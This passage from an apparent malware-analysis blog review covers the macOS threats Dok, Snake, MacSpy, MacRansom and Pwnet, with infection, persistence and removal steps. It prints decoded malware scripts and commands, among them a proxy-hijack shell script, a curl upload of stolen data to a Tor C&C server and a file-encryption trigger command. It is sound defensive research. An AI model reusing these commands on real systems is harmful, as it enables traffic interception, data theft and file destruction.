modifies the infected host's network settings in order to set up a proxy who's address is (dynamically)\r\nspecified via a remote proxy auto-configuration (PAC) file. This is accomplished by decoding then executing a base64-\r\nencoded string (which turns out to be a script which re-configures network settings):\r\n $ python\r\n \u003e\u003e\u003e import base64\r\n \u003e\u003e\u003e base64.b64decode('IyEvYmluL3NoC...XMiCg==')\r\n #!/bin/sh\r\n ip=$(curl api.ipify.org)\r\n str=$(env LC_CTYPE=C tr -dc \"a-zA-Z0-9\" \u003c /dev/urandom | head -c 10)\r\n autoProxyURL=\"http://127.0.0.1:5555/${str}.js?ip=${ip}\"\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 43 of 67\n\n/usr/sbin/networksetup -detectnewhardware\r\n IFS=$'\\n'\r\n for i in $(networksetup -listallnetworkservices | tail +2 );\r\n do\r\n autoProxyURLLocal=`/usr/sbin/networksetup -getautoproxyurl \"$i\" | head -1 | cut -c 6-`\r\n echo \"$i Proxy set to $autoProxyURLLocal\"\r\n if [[ $autoProxyURLLocal != $autoProxyURL ]]; then\r\n /usr/sbin/networksetup -setautoproxyurl $i $autoProxyURL\r\n echo \"Set auto proxy for $i to $autoProxyURL\"\r\n fi\r\n /usr/sbin/networksetup -setautoproxystate \"$i\" on\r\n echo \"Turned on auto proxy for $i\"\r\n \r\n done\r\n unset IFS\r\n echo \"Auto proxy present, correct \u0026 enabled for all interfaces\"\r\nOne can see this malicious network reconfiguration via the Network pane in System Preferences (image credit: CheckPoint):\r\nOnce the malware has installed the attacker certificate, installed tor and socat, and reconfigured the infected host's network\r\nsettings, all the user's traffic will be proxied thru the attacker's infrastructure. This is perhaps more eloquently stated by the\r\nCheckPoint researchers:\r\n\"As a result of all of the above actions, when attempting to surf the web, the user's web browser will first ask the attacker\r\nweb page on TOR for proxy settings. The user traffic is then redirected through a proxy controlled by the attacker, who\r\ncarries out a Man-In-the-Middle attack and impersonates the various sites the user attempts to surf. The attacker is free to\r\nread the victim's traffic and tamper with it in any way they please.\"\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 44 of 67\n\nSo why redirect the user's traffic? Well, any number of reasons. However, as OSX/Dok is a port of a Windows banking\r\ntrojan (Retefe), its main goal is to extract user's banking credentials from the redirected traffic, or manipulate traffic in order\r\nto gain access to financial accounts. For more information on this methodology, check out CheckPoint's follow-up report:\r\nOSX/Dok Refuses to Go Away and It's After Your Money.\r\n disinfection:\r\nFully cleaning up a OSX/Dok infection is somewhat difficult due to the multitude of changes it makes to an infected system.\r\n(As Thomas Reed notes, \"there are many leftovers and modifications to the system that cannot be as easily reversed.\").\r\nFirst, if it still exists, remove the malware's initial Login Item ('AppStore').\r\nThen, delete the two Launch Agents\"\r\n1. Unload the malware's persistent launch agent via the 'launchctl unload' command:\r\n$ launchctl unload ~/Library/LaunchAgents/com.apple.Safari.pac.plist\r\n$ launchctl unload ~/Library/LaunchAgents/com.apple.Safari.proxy.plist\r\n2. Remove the malicious launch agent plist files: ~/Library/LaunchAgents/com.apple.Safari.pac.plist\r\n~/Library/LaunchAgents/com.apple.Safari.proxy.plist\r\nNext, remove the attacker's certificate that was added to the system, using the Keychain Access application (certificate\r\nname: COMODO RSA Extended Validation Secure Server CA 2).\r\nFinally remove tor and socat via HomeBrew (i.e. $ brew rm FORMULA). If didn't have HomeBrew already installed -\r\nmeaning the malware installed it, that can be removed as well.\r\nHonestly, if infected with OSX/Dok it's suggested you just fully re-install macOS!\r\n Snake\r\nfound: May, Fox-IT\r\ninfection: trojanized Flash Installer\r\nfeatures: currently in development, but likely 'standard' cyber-espionage capabilities\r\ndisinfection: remove launch daemon\r\nwriteups:\r\n\"Snake: Coming soon in Mac OS X flavour\" (Fox-IT)\r\n\"Snake malware ported from Windows to Mac\" (MalwareBytes)\r\nAn in-progress port of the highly sophisticated Windows 'Snake' cyber-espionage persistent implant, the Mac version has yet\r\nto be seen (publicly) wild nor is fully-featured....yet!\r\n infection:\r\nFox-IT, the company that originally discovered the Mac version of Snake, note the following:\r\n\"Though Snake is typically spread using spear-phishing e-mails and watering hole attacks Fox-IT has not yet observed this\r\n[macOS] sample being spread in the wild.\"\r\n\"As this version contains debug functionalities ....it is likely that the OS X version of Snake is not yet operational.\"\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 45 of 67\n\nSince (at the time of discovery), the macOS version of Snake is likely not yet operational, it is not surprising that has yet to\r\nbe seen infecting Mac users in the wild.\r\nWhat we do know, is that Snake is packaged in a trojanized Adobe Flash installer:\r\nThis infected installer application is (re)signed, to ensure that it won't be blocked by Gatekeeper (in its default setting):\r\n ./jtool --sig \"Install Adobe Flash Player.app/Install\"\r\n Blob at offset: 46992 (9616 bytes) is an embedded signature\r\n Code Directory (390 bytes)\r\n Version: 20200\r\n Flags: none\r\n CodeLimit: 0xb790\r\n Identifier: com.addy.InstallAdobeFlash (0x34)\r\n Team ID: EHWBRW848H (0x4f)\r\n CDHash: ffc1a65f9153c94999212fb8bd7e3950eca035ae (computed)\r\nAs shown by WhatsYourSign, this certificate was revoked by Apple:\r\nSince the format of the trojaned application bundle is rather unstandard (i.e. it's missing the Contents/MacOS/ directory) it is\r\nnot immediately clear what binary will be executed when the application is launched. However, by dumping the\r\napplication's Info.plist file, and looking at the value of the CFBundleExecutable key, we can see it's a binary named Install:\r\n $ defaults read ~/Downloads/Snake/Install\\ Adobe\\ Flash\\ Player.app/Info.plist\r\n {\r\n BuildMachineOSBuild = 13F34;\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 46 of 67\n\nCFBundleDevelopmentRegion = en;\r\n CFBundleExecutable = Install;\r\n CFBundleIconFile = \"app.icns\";\r\n CFBundleIdentifier = \"com.addy.InstallAdobeFlash\";\r\n CFBundleInfoDictionaryVersion = \"6.0\";\r\n CFBundleName = \"Install Adobe Flash Player\";\r\n ...\r\n }\r\nThe Install is a simple binary whose main job is to execute a script, install.sh, via the \"do shell script [script] with\r\nadministrator privileges\" AppleScript command:\r\n int _main(int arg0, int arg1) {\r\n rax = [NSBundle mainBundle];\r\n rax = [rax retain];\r\n rax = [rax bundlePath];\r\n \r\n rax = [NSString stringWithFormat:@\"'%@%@'\", rax, @\"/install.sh\"];\r\n \r\n var_A8 = [NSString stringWithFormat:@\"do shell script \\\"%@\\\" with administrator\r\n privileges\", rax];\r\n \r\n var_B0 = [[NSAppleScript alloc] initWithSource:var_A8];\r\n var_188 = [var_B0 executeAndReturnError:\u0026var_B8];\r\n ...\r\nExecuting this AppleScript command will first cause the system to display a standard authentication prompt (due to the\r\n\"with administrator privileges\"):\r\nAs installers, such as Flash, typically display such authentication prompts, it's likely the user will naively enter their\r\ncredentials. At this point, the install.sh script will be executed with elevated privileges.\r\nLet's dump the install.sh script:\r\n #!/bin/sh\r\n SCRIPT_DIR=$(dirname \"$0\")\r\n TARGET_PATH=/Library/Scripts\r\n TARGET_PATH2=/Library/LaunchDaemons\r\n cp -f \"${SCRIPT_DIR}/queue\" \"${TARGET_PATH}/queue\"\r\n cp -f \"${SCRIPT_DIR}/installdp\" \"${TARGET_PATH}/installdp\"\r\n cp -f \"${SCRIPT_DIR}/installd.sh\" \"${TARGET_PATH}/installd.sh\"\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 47 of 67\n\ncp -f \"${SCRIPT_DIR}/com.adobe.update\" \"$TARGET_PATH2/com.adobe.update.plist\"\r\n \"${TARGET_PATH}/installd.sh\"\r\n \"${SCRIPT_DIR}/Install Adobe Flash Player\"\r\n exit $RC\r\nEasy to see it:\r\ncopies several files (queue, installdp, etc.), to the /Library/Scripts directory\r\npersists the com.adobe.update file as a Launch Daemon\r\nexecutes the installd.sh script\r\nkicks off the legitimate Flash installer, Install Adobe Flash Player\r\n persistence:\r\nThe persistent part of the infection, is the com.adobe.update Launch Daemon. As it's a binary plist file, dump its contents\r\nwith the plutil utility (using the -p commandline flag):\r\n $ plutil -p com.adobe.update\r\n {\r\n \"KeepAlive\" =\u003e 1\r\n \"Label\" =\u003e \"com.apple.update\"\r\n \"OnDemand\" =\u003e 1\r\n \"POSIXSpawnType\" =\u003e \"Interactive\"\r\n \"ProgramArguments\" =\u003e [\r\n 0 =\u003e \"/Library/Scripts/installd.sh\"\r\n ]\r\n }\r\nAs the KeepAlive key has been set to 1 (true), the Launch Daemon will be automatically started everytime the infected\r\nsystem is rebooted. Looking at the ProgramArguments array, we can see persisting the installd.sh script:\r\n #!/bin/bash\r\n SCRIPT_DIR=$(dirname \"$0\")\r\n FILE=\"${SCRIPT_DIR}/queue#1\"\r\n PIDS=`ps cax | grep installdp | grep -o '^[ ]*[0-9]*'`\r\n if [ -z \"$PIDS\" ]; then\r\n ${SCRIPT_DIR}/installdp ${FILE} n\r\n fi\r\nAs noted by the Fox-IT researchers, this \"script checks if installdp is already running, if not it will start with\r\n/Library/Scripts/queue#1 n.\" In other words, the installdp binary -which is the malware's main component, will be\r\nautomatically started whenever the OS is initialized.\r\n features:\r\nThis macOS port of Snake appears to be a test (or debug) build. The Fox-IT write up highlights various strings embedded\r\nwithin the installdp that backup this claim:\r\n 000000010013cf20 db \"Usage: snake_test e[vent]|n[ormal]\\n\", 0\r\n 000000010013cf7d db \"../../../snake/snake_test.c\", 0\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 48 of 67\n\nThey also note that though Snake binaries contain obfuscated strings (possibly commands or config data?), in the macOS\r\nversion there are only \"placeholders that are yet to be replaced by the actual values, which is another indication that this\r\nSnake binary is not yet ready to deploy to targets.\"\r\nSo what does the Snake actual do? This is a good question! First, if we look at the Windows version (which has been well\r\nstudied by the anti-virus industry), holy $h!t its legit! Seriously, go read the reports about this malware and it's operations:\r\n\"The Epic Turla Operation\" (Kaspersky)\r\n\"Satellite Turla: APT Command and Control in the Sky\" (Kaspersky)\r\n\"The Snake Campaign\" (BAE Systems)\r\n0days, successful penetration of classified networks, C\u0026C via satellite link hijacking....in a way, stunningly beautiful!\r\nin Back to Mac version though...honestly it's tough to know the extent of it's capabilities.\r\nFirst, as already noted, it does not appear to be ready to deploy. Thus it's possible that features or capabilities have not yet\r\nbeen implemented or configured in the macOS version. For example, the malware contains a function named, hide_module.\r\nLooking at it's disassembly however, we can see it's not (yet?) implemented:\r\n hide_module:\r\n 00000001000093d0 push rbp\r\n 00000001000093d1 mov rbp, rsp\r\n 00000001000093d4 pop rbp\r\n 00000001000093d5 ret\r\nSecond, as Snake is part of a incredibly sophisticated cyber-espionage operation, we've seen operators (on the Windows side\r\nof the house), utilize capabilities in a modular fashion. Looking at function names within the installdp binary, it appears to\r\nsupport a similar modular-based plugin architecture:\r\nThis means that analyzing any single component of malware individually (i.e. just the installdp binary), may be akin to\r\nlooking at a single piece of a complex puzzle. Rather hard to get a full understanding.\r\nFinally, the Fox-IT report states that:\r\n \"Builds of Snake generally contain a Queue file. Queue files are used to store Snake's\r\n configuration data, module binaries and queued network packets\".\r\nAnd while the macOS sample does contain such a queue file, I am not sure how to decrypt or understand it fully. Note that\r\nthe Fox-IT researchers dump some its content and extract \"transport chains\":\r\n $ python MM_snake_queuefile.py queue\r\n OFFSET STREAM TYPE ID SIZE WRITTEN DATA\r\n 2017-02-10 12:23:22 '\\x98\\xa7w{\\xc7\\xcc4\\x03-\\xdcz\\x0b\\xc9,`\\x1c'\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 49 of 67\n\n2017-02-10 12:23:22 '\\x90*\\xa6\\xc5c\\x89H\\xe2\u003e\\x9fS\\x1f\\xb2\\x0b\\xf8\\xb7'\r\n 2017-02-10 12:23:22 '\\x95\\x9a\\xdf\\x82\\xf8l\\xbe.YR)\\xcc\\x1a{\\xac\\x8f'\r\n 2017-02-10 12:23:22 '300000\\x00'\r\n 2017-02-10 12:23:22 '600000\\x00'\r\n 2017-02-10 12:23:22 '20000\\x00'\r\n 2017-02-10 12:23:22 '4096\\x00'\r\n 2017-02-10 12:23:22 '65536\\x00'\r\n 2017-02-10 12:23:22 '4096\\x00'\r\n 2017-02-10 12:23:22 '65536\\x00'\r\n 2017-02-10 12:23:22 '1000\\x00'\r\n 2017-02-10 12:23:22 '\\xfb \\xb20\\x87\\xb9m\\xa2\\x80!\\x80\\xcc\\x1aJbX'\r\n 2017-02-10 12:23:22 '0xfd4488e9\\x00'\r\n 2017-02-10 12:23:22 '0\\x00'\r\n 2017-02-10 12:23:22 '2\\x00'\r\n 2017-02-10 12:23:22 'enc.unix//tmp/.gdm-socket\\x00'\r\n 2017-02-10 12:23:22 'enc.frag.reliable.doms.unix//tmp/.gdm-selinux\\x00'\r\n 2017-02-10 12:23:22 'read_peer_nfo=Y,psk=!HqACg3ILQd-w7e4\\x00'\r\n 2017-02-10 12:23:22 'psk=R@gw1gBsRP!5!yj0\\x00'\r\n 2017-02-10 12:23:23 '1\\x00'\r\n 2017-02-10 12:23:23 'enc.http.tcp/car-service.effers.com:80\\x00'\r\n 2017-02-10 12:23:23 'psk=1BKQ55n6#OsIgwn*,ustart=bc41f8cd.0\\x00'\r\n 2017-02-10 12:23:23 '1\\x00'\r\n 2017-02-10 12:23:23 'enc.http.tcp/car-service.effers.com:80\\x00'\r\n 2017-02-10 12:23:23 'psk=1BKQ55n6#OsIgwn*,ustart=bc41f8cd.0\\x00'\r\nHowever, we can still get some insight into the malware's features. For example there are various functions in the malware\r\n(name: snake_cmd*), that appear to support standard backdoor features or capabilities such as reading/writing files,\r\nexecuting commands, listing running processes, and surveying an infected system:\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 50 of 67\n\nTaking a closer look, say at the snake_cmd_kill command, we can see that invokes the kill API to terminate a process:\r\n int _snake_cmd_kill() {\r\n rbx = rdx;\r\n rcx = _data_from_params(rbx, 0x2, 0x2, \u0026var_C, 0x4);\r\n rax = 0x21590065;\r\n if (rcx != 0x0) {\r\n var_10 = 0x9;\r\n _data_from_params(rbx, 0x6, 0x2, \u0026var_10, 0x4);\r\n rcx = kill(var_C, var_10);\r\n rax = 0x0;\r\n if (rcx == 0xffffffff) {\r\n rax = rcx;\r\n }\r\n }\r\n return rax;\r\n }\r\nThe implant also appears to support more advanced features, such as the ability to execute libraries directly from memory,\r\nvia the NSCreateObjectFileImageFromMemory and NSLinkModule APIs:\r\n int _LdrInjectLibraryA(int arg0, int arg1, int arg2) {\r\n r14 = r9;\r\n r15 = arg2;\r\n r12 = arg1;\r\n rbx = arg0;\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 51 of 67\n\nif (rbx != 0x0) {\r\n rcx = sign_extend_64(getpid());\r\n rax = 0x21590001;\r\n if (rcx == rbx) {\r\n var_28 = 0x0;\r\n rcx = NSCreateObjectFileImageFromMemory(r12, r15, \u0026var_28);\r\n rax = 0xffffffff;\r\n if (rcx == 0x1) {\r\n rax = NSLinkModule(0x0, \"\", 0x7);\r\n *r14 = rax;\r\n CMP(rax, 0x1);\r\n rax = rax - rax + CARRY(RFLAGS(cf));\r\n }\r\n }\r\n }\r\n else {\r\n var_28 = 0x0;\r\n rcx = NSCreateObjectFileImageFromMemory(r12, r15, \u0026var_28);\r\n rax = 0xffffffff;\r\n if (rcx == 0x1) {\r\n rax = NSLinkModule(0x0, \"\", 0x7);\r\n *r14 = rax;\r\n CMP(rax, 0x1);\r\n rax = rax - rax + CARRY(RFLAGS(cf));\r\n }\r\n }\r\n return rax;\r\n }\r\nFor more info on directly executing binaries from memory, see: \"Running Executables on macOS From Memory\"\r\nFinally, if you're still doubting the potential of this malware, note that it \"car-service.effers.com\" is the domain (as pointed\r\nout by Fox-IT) which the macOS version of Snake is configured to utilize for HTTP network transport. Why is this\r\ninteresting? Because \"the resolving IP belongs to a Satellite communications provider\" ... did somebody say satellite-based\r\nC\u0026C?\r\n disinfection:\r\nAs this version of OSX/Snake simply persists as a Launch Daemon, it's trivial to removed from an infected system.\r\n1. Unload the malware's persistent Daunch Daemon via the 'launchctl unload' command:\r\n$ launchctl unload /Library/LaunchDaemons/com.adobe.update\r\n2. Remove the malicious Launch Daemon plist file /Library/LaunchDaemons/com.adobe.update\r\n3. Remove the malware's persistent script (installd.sh), and binary (installdp), and queue file (queue), from the\r\n/Library/Scripts directory\r\nHonestly though, if you're infected with OSX/Snake - due to the sophistication of the actors associated with this malware,\r\nyou should at a minimum fully re-install macOS! Better yet, just burn everything down and start over.\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 52 of 67\n\nMacSpy\r\nfound: June, Catalin Cimpanu (@campuscodi)\r\ninfection: n/a\r\nfeatures: fully-featured backdoor, with the ability to collect keystrokes, screenshots, audio, \u0026 more.\r\ndisinfection: remove launch agent\r\nwriteups:\r\n\"MacSpy: OS X RAT as a Service\" (AlienVault)\r\n\"New Mac Malware-as-a-Service offerings\" (MalwareBytes)\r\nMacSpy is (AFAIK) the first 'Malware-as-a-Service' (MaaS) for macOS. Offered on the 'dark web' it's a fairly standard\r\nbackdoor (RAT), though does support a wide range of features such as collecting keystrokes, screenshots, audio, clipboard\r\ndata, and more.\r\n infection:\r\nAs MacSpy is offered by the author as a pre-built binary (i.e. 'Malware-as-a-Service'), it is up to the consumer of the\r\nmalware to find a way to infect target computers. As noted in AlienVault's writeup, the malware author suggests manually\r\ncopying it to target mac, then manually executing it:\r\nUsing WhatsYourSign, we can see this malware's binary image is not signed:\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 53 of 67\n\nAs such, Gatekeeper should block the malware from executing - unless the user (or attacker locally installing the malware)\r\nexplicitly agrees to allow the unsigned malicious code to execute.\r\n persistence:\r\nMacSpy persists as a LaunchAgent. When executed, the malware will dynamically build the launch agent plist (see\r\nsub_10008c510):\r\n void sub_10008c510() {\r\n xmm0 = intrinsic_punpcklqdq(zero_extend_64(\"\\n\"), zero_extend_64(0x27));\r\n var_40 = intrinsic_movdqa(var_40, xmm0);\r\n var_30 = 0x0;\r\n sub_1002f3030(\"\u003c!DOCTYPE plist PUBLIC \\\"-//Apple//DTD PLIST 1.0//EN\\\" ... \u0026var_40);\r\n if ((var_38 \u0026 0x3fffffffffffffff) != 0x0) {\r\n sub_1002f3030(\"\u003cplist version=\\\"1.0\\\"\u003e\\n\", 0x16, 0x0, \u0026var_40);\r\n ...\r\n if ((var_38 \u0026 0x3fffffffffffffff) != 0x0) {\r\n rcx = \u0026var_40;\r\n sub_1002f3030(\"\\t\\t\u003ckey\u003eProgram\u003c/key\u003e\\n\", 0x15, 0x0, rcx);\r\n }\r\n ...\r\n if ((var_38 \u0026 0x3fffffffffffffff) != 0x0) {\r\n sub_1002f3030(\"\\t\\t\u003ckey\u003eRunAtLoad\u003c/key\u003e\\n\", 0x17, 0x0, \u0026var_40);\r\n }\r\nThis plist is saved to ~/Library/LaunchAgents/com.apple.webkit.plist. As the RunAtLoad key is set to true, the value in\r\nProgram key will be executed automatically whenever the user logs in. The value of this key is set to\r\n~/Library/.DS_Stores/updated, which is a persistent copy of the malware:\r\n $ cat ~/Library/LaunchAgents/com.apple.webkit.plist\r\n \u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 54 of 67\n\nLabelcom.apple.webkitProgram/Users/user/Library/.DS_Stores/updatedProgramArgumentsdaemonRunAtLoadKeepAlive features:\nMacSpy claims to be the \"most sophisticated Mac spyware\":\nHowever Thomas Reed notes that in reality \"MacSpy is fairly simple spyware, which gathers data into temporary files and\nsends those files periodically back to a Tor command \u0026 control (C\u0026C) server via unencrypted http.\"\nOne thing is for sure, MacSpy does supports a decent set for features designed to 'spy' or collect data about infected systems.\nIts author kindly documented its features:\nhttps://objective-see.com/blog/blog_0x25.html\nPage 55 of 67\n\nA paid version of the malware apparently contains even more features, such as full exfiltration capabilities, ransomware\r\nabilities, and access to social media data:\r\nOther 'features' of the MacSpy include anti-debugging and anti-VM logic. As AlienVault notes in their writeup, this includes:\r\ninvoking ptrace with PT_DENY_ATTACH to prevent debuggers (such as lldb) from attaching\r\ninvoking sysctl with KERN_PROC and KERN_PROC_PID, then checking if the P_TRACED flag is set, to detect\r\nruntime debugging\r\nchecking to make sure it's executing on a system with at more than one CPU, and least 4GB of memory (on most\r\ndefault virtual machine images, this check will fail).\r\nchecking to make sure it's executing on a machine with a model contain 'Mac'. On a virtual machine, this check will\r\nfail:\r\n $ sysctl hw.model\r\n hw.model: VMware7,1\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 56 of 67\n\nIn terms of exfiltration, MacSpy utilizes Tor. The malware ships with various legitimate Tor binaries (named webkitproxy\r\nand libevent-2.0.5.dylib) that allow it to connect to the Tor network. Specifically it sets up a local Tor proxy and utilizes curl\r\nin order to route all it's traffic to it's Tor-based C\u0026C server.\r\nHere's an example of MacSpy exfiltrating various survey data (stored by the malware in\r\n~/Library/.DS_Stores/data/tmp/SystemInfo):\r\n /usr/bin/curl --fail -m 25 --socks5-hostname 127.0.0.1:47905 -ks -X POST -H key: -H\r\n type:system -H Content-Type:multipart/form-data\r\n -F system=@'/Users/user/Library/.DS_Stores/data/tmp/SystemInfo'\r\n http://\u003credacted\u003e\u003e.onion/upload\r\n disinfection:\r\nMacSpy can easily be removed from an infected system, via the following steps:\r\n1. Unload the malware's persistent launch agent via the 'launchctl unload' command:\r\n $ launchctl unload ~/Library/LaunchAgents/com.apple.webkit.plist\r\n2. Remove the malicious launch agent plist file ~/Library/LaunchAgents/com.apple.webkit.plist\r\n3. Remove the directory, /Library/.DS_Stores/updated, created by the malware that contains it's persistent backdoor and\r\nother components.\r\n MacRansom\r\nfound: June, Fortinet\r\ninfection: n/a\r\nfeatures: persistent ransomware\r\ndisinfection: remove launch agent\r\nwriteups:\r\n\"MacRansom: Offered as Ransomware as a Service\" (Fortinet)\r\n\"MacRansom: Analyzing the Latest Ransomware to Target Macs\" (Objective-See)\r\nMacRansom is the the first 'Ransomware-as-a-Service' for macOS, that aims to encrypt (ransom) all user's files. Likely\r\ncreated by the same author who coded up MacSpy, it was similarly offered on the 'dark web' for download.\r\n infection:\r\nMacRansom is offered by the author, on Tor, as a pre-built binary (i.e. 'Malware-as-a-Service'):\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 57 of 67\n\nIt is up to the consumer of the malware to find a way to infect target computers.\r\nThe Fortinet researchers corresponded with the malware author who noted that in order to infect a victim that malware\r\nshould be run (manually) off a USB stick:\r\nRather lame...but of course 'consumers' of the malware could deploy it in other manners (e.g. email attachments, etc.).\r\n persistence:\r\nMacRansom persists as a LaunchAgent. It does this by:\r\n1. Copying itself to ~/Library/.FS_Store\r\n2. Decoding an embedded plist and writing it out to ~/Library/LaunchAgents/com.apple.finder.plist:\r\ncat ~/Library/LaunchAgents/com.apple.finder.plist\r\n\u003cplist version=\"1.0\"\u003e\r\n\u003cdict\u003e\r\n  \u003ckey\u003eLabel\u003c/key\u003e\r\n  \u003cstring\u003ecom.apple.finder\u003c/string\u003e\r\n  \u003ckey\u003eStartInterval\u003c/key\u003e\r\n  \u003cinteger\u003e120\u003c/integer\u003e\r\n  \u003ckey\u003eRunAtLoad\u003c/key\u003e\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 58 of 67\n\nProgramArgumentsbash-c! pgrep -x .FS_Store \u0026\u0026 ~/Library/.FS_Store As the 'RunAtLoad'' key is set to 'true' the malware will be automatically started whenever the user logs in. Specifically the\nOS will execute the value of the 'ProgramArguments' key: bash -c ! pgrep -x .FS_Store \u0026\u0026 ~/Library/.FS_Store. This\ncommand will first check to make sure the malware isn't already running, then will start the malware (~/Library/.FS_Store).\nLucky for Objective-See users, BlockBlock will alert you about this persistent attempt:\nAs the malware first attempts to persist before encrypting any files, clicking 'Block' on the BlockBlock alert will stop the\nmalware before it's done any damage :)\n features:\nAs it's name suggest, MacRansom will ransom (encrypt) users files. Once up and running it checks to see if it's hit a 'trigger'\ndate. That is, it checks if the current time is past a hard-coded value. According to the Fortinet report, this is set by the\nmalware author (part of the 'ransomware as a service'). If the current time is before this date, the malware will not encrypt\n(ransom) any files, and instead will exit:\nHowever, if the trigger date has been hit, ransoming commences! Specifically at address 0x000000010b4eb5f5, the malware\nexecutes the following, via system to begin encrypting the user's files:\n(lldb)\nProcess 7280 stopped\nhttps://objective-see.com/blog/blog_0x25.html\nPage 59 of 67\n\n* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step over\r\nframe #0: 0x000000010b4eb5f5 .FS_Store`___lldb_unnamed_symbol1$$.FS_Store + 1541\r\n  -\u003e 0x10b4eb5f5 \u003c+1541\u003e: callq 0x10b4ec8fe ; symbol stub for: system\r\n  0x10b4eb5fa \u003c+1546\u003e: movaps 0x151f(%rip), %xmm0\r\n  0x10b4eb601 \u003c+1553\u003e: movaps %xmm0, -0x850(%rbp)\r\n  0x10b4eb608 \u003c+1560\u003e: movb $0x0, -0x840(%rbp)\r\n(lldb) x/s $rdi\r\n0x7fff547123e0: \"find /Volumes ~ ! -path \"/Users/user/Library/.FS_Store\" -type f -size +8c -user `whoami` -perm -u=r -exec\r\n\"/Users/user/Library/.FS_Store\" {} +\"\r\nWhat does this command do?\r\nfind /Volumes ~ ! -path \"/Users/user/Library/.FS_Store\" -type f -size +8c -user `whoami` -perm -u=r -exec\r\n\"/Users/user/Library/.FS_Store\" {} +\r\nFirst, returns a list of user files that are readable and bigger than 8 bytes. Then these files will be passed (to a new instance)\r\nof the malware, in order to be encrypted! We can observe this encryption via a utility such as fs_usage:\r\naccess (_W__) /Users/user/Desktop/pleaseDontEncryptMe.txt\r\nopen F=50 (RW____) /Users/user/Desktop/pleaseDontEncryptMe.txt\r\nWrData[AT1] D=0x018906a8 /Users/user/Desktop/pleaseDontEncryptMe.txt\r\nThe actual encryption routine of the malware begins at 0x0000000100002160. This function is invoked indirectly via a call\r\nto 'pthread_create()':\r\nAs noted by Fortinet, the encryption is not some RSA-based scheme, but rather uses a symmetric cryptographic algorithm.\r\nUnfortunately (for users) though there is a static key (0x39A622DDB50B49E9), Joven and Chin Yick Low state that for\r\neach file the key is \"permuted with a random generated number.\" Moreover, this random permutation is not saved nor\r\nconveyed to the attacker.\r\nThus it appears that once encrypted, the files are pretty much gone for good (save for a perhaps a brute force decryption\r\nattack).\r\nGood news, RansomWhere? can generically detect at block this attack:\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 60 of 67\n\ndisinfection:\r\nMacRansom can easily be removed from an infected system, via the following steps:\r\n1. Unload the malware's persistent launch agent via the 'launchctl unload' command:\r\n $ launchctl unload ~/Library/LaunchAgents/com.apple.finder.plist\r\n2. Remove the malicious launch agent plist file ~/Library/LaunchAgents/com.apple.finder.plist\r\n3. Remove the directory, /Library/.FS_Store/. This directory was created by the malware and contains it's persistent\r\nbinary and other components.\r\n Pwnet\r\nfound: August, SentinelOne\r\ninfection: trojanized 'CS:GO hack'\r\nfeatures: cryptocurrency miner\r\ndisinfection: remove launch daemon and miner\r\nwriteups: \"Osx.Pwnet.A - CS: GO hack and sneaky miner\" (SentinelOne)\r\nArnaud Abbati (@noarfromspace) who uncovered Pwnet, describes it as a, \"trojan that could mine CryptoCurrencies\r\nwithout user consent\" embedded in a hack for Counter-Strike: Global Offensive.\r\n infection:\r\nArnaud notes that the infection vector for Pwnet begins at vlone.cc. Though this portal now appears offline, in the past users\r\ncould login in to download a hack for the popular game, 'Counter-Strike Global Offensive'.\r\nThe main binary, (vhook) is not signed:\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 61 of 67\n\n...and must be run with root privileges:\n $ ./vhook\n\nRoot access required!\n Please type \"sudo ./vhook\"\nIn the background, Arnaud states that, \"vHook also sneaky downloads and extracts https://vlone.cc/abc/assets/asset.zip as\nfonts.zip to /var/, changes directory to /var and runs sudo ./helper \u0026.\"\nThis binary, helper downloads yet more components (such as com.dynamsoft.WebHelper), which in turn download still\nmore items. (For details see Arnaud's writeup: \"Osx.Pwnet.A - CS: GO hack and sneaky miner\"). The end result is\nOSX/Pwnet being persistently installed.\n persistence:\nThe final action of the installer, is to download a binary named WebTwainService (from\nhttps://www.vlone.cc/abc/assets/d.zip), is persisted as a launch daemon via com.dynamsoft.WebTwainService.plist:\n $ cat com.dynamsoft.WebTwainService.plist ?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e StandardErrorPath/var/log/webtwain.logStandardOutPath/var/log/webtwain.logKeepAliveLabelcom.dynamsoft.WebTwainServiceRunAtLoad https://objective-see.com/blog/blog_0x25.html\nPage 62 of 67\n\n\u003ckey\u003eProgramArguments\u003c/key\u003e\r\n \u003carray\u003e\r\n \u003cstring\u003e/var/.log/WebTwainService\u003c/string\u003e\r\n \u003c/array\u003e\r\n \u003c/dict\u003e\r\n \u003c/plist\u003e\r\nAs the 'RunAtLoad' key is set to true, the value in the 'ProgramArguments' (/var/.log/WebTwainService), will be\r\nautomatically executed by the OS each time the infected computer is restarted.\r\n features:\r\nThe main goal of Pwnet is to mine cryptocurrency via an official minergate command line tool.\r\nFirst, the malware's persistent daemon, WebTwainService, executes the com.dynamsoft.webhelper binary:\r\n int _main(int arg0, int arg1)\r\n {\r\n var_18 = objc_autoreleasePoolPush();\r\n system(\"cd /var/.log/;sudo ./com.dynamsoft.WebHelper \u0026\");\r\n objc_autoreleasePoolPop(var_18);\r\n goto loc_100000b27;\r\n loc_100000b27:\r\n sleep(0xe10);\r\n goto loc_100000b27;\r\n }\r\nAs Arnaud notes in his writeup, com.dynamsoft.webhelper, performs various actions including executing the minergate cli\r\n(which Pwnet names: 'com.apple.SafariHelper'):\r\ncd /var/.trash/.assets/; ./com.apple.SafariHelper\r\nWhen the miner 'com.apple.SafariHelper' is executed, it eats up all CPU cycles in order to mine XMR (Monero).\r\n disinfection:\r\nTo remove OSX/Pwnet, first unload and remove its persistent launch daemon plist:\r\n $ launchctl 